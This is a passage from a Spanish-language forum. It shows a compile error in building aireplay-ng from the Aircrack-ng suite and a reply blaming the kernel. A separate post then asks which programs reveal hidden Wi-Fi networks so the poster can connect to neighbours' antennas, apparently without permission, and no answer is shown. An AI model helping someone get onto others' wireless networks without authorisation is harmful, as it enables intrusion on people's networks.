/usr/include/linux/wireless.h:644: error: expected ‘:’, ‘,’, ‘;’, ‘}’ or ‘__attribute__’ before ‘*’ token
make: *** [aireplay-ng] Error 1

Agradecería cualquier luz sobre el asunto.


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: pianista en 5 Junio 2007, 10:48 am
Tiene pinta del kernel...
Compila el kernel y mira si te funciona...
Saludos
PD:Revisa las opciones del kernel en wireless


Título: Como ver las redes inalambricas OCULTAS ?
Publicado por: escuchametk en 24 Marzo 2011, 14:28 pm
hola amigo mi pregunta es como puedo ver las redes que estan ocultas su SSID, su nombre esta oculto . Quisiera saber los nombres de los programas. por mi brrio tengo muchas antenas pero estan ocultas y no puedo conectarme ni tampoco puedo verlas con el bactrack